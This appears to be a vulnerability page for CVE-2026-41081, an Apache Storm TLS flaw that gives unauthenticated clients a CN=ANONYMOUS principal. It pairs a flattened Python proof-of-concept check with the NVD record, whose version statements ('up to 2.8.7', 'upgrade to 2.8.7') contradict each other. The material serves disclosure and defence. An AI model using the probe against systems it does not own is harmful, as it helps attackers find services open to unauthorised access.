CVE-2026-41081

import ssl import socket # Conceptual PoC for CVE-2026-41081 # Attempt to connect to Apache Storm Nimbus/TLS port without presenting a client certificate. # If the server accepts the connection and assigns 'CN=ANONYMOUS', the vulnerability is confirmed. def check_vulnerability(host, port): context = ssl.create_default_context() # Do not load client certs to simulate unauthenticated client context.check_hostname = False context.verify_mode = ssl.CERT_NONE # For testing purposes only try: with socket.create_connection((host, port)) as sock: with context.wrap_socket(sock, server_hostname=host) as ssock: print(f"[+] Connected to {host}:{port}") # If connected, check logs or behavior to see if Principal is ANONYMOUS # Exploitation depends on whether the Authorizer allows ANONYMOUS access. print("[+] TLS Handshake successful without client certificate.") print("[!] Check server logs for assignment of CN=ANONYMOUS principal.") return True except Exception as e: print(f"[-] Connection failed: {e}") return False if __name__ == "__main__": target_host = "127.0.0.1" target_port = 6627 # Default Storm Nimbus TLS port check_vulnerability(target_host, target_port)

{"cve": {"id": "CVE-2026-41081", "sourceIdentifier": "[email protected]", "published": "2026-04-27T14:16:48.167", "lastModified": "2026-04-28T19:46:06.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Handling of TLS Client Authentication Failure Leading to Anonymous Principal Assignment in Apache Storm\n\nVersions Affected: up to 2.8.7\n\nDescription: When TLS transport is enabled in Apache Storm without requiring client certificate authentication (the default configuration), the TlsTransportPlugin assigns a fallback principal (CN=ANONYMOUS) if no client certificate is presented or if certificate verification fails. The underlying SSLPeerUnverifiedException is caught and suppressed rather than rejecting the connection.\n\nThis fail-open behavior means an unauthenticated client can establish a TLS connection and receive a valid principal identity. If the configured authorizer (e.g., SimpleACLAuthorizer) does not explicitly deny access to CN=ANONYMOUS, this may result in unauthorized access to Storm services. The condition is logged at debug level only, reducing visibility in production.\n\nImpact: Unauthenticated clients may be assigned a principal identity, potentially bypassing authorization in permissive or misconfigured environments.\n\nMitigation: Users should upgrade to 2.8.7 in which TLS authentication failures are handled in a fail-closed manner.\n\nUsers who cannot upgrade immediately should:\n- Enable mandatory client certificate authentication (nimbus.thrift.tls.client.auth.required: true)\n- Ensure authorization rules explicitly deny access to CN=ANONYMOUS\n- Review all ACL configurations for implicit default-allow behavior"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:storm:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.8.7", "matchCriteriaId": "9286B022-3864-4ED1-B740-F1BD9B79820F"}]}]}], "references": [{"url": "https://lists.apache.org/thread/plxx5l29dvplk5rwzdcq53rdfl6v4gs8", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/25/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}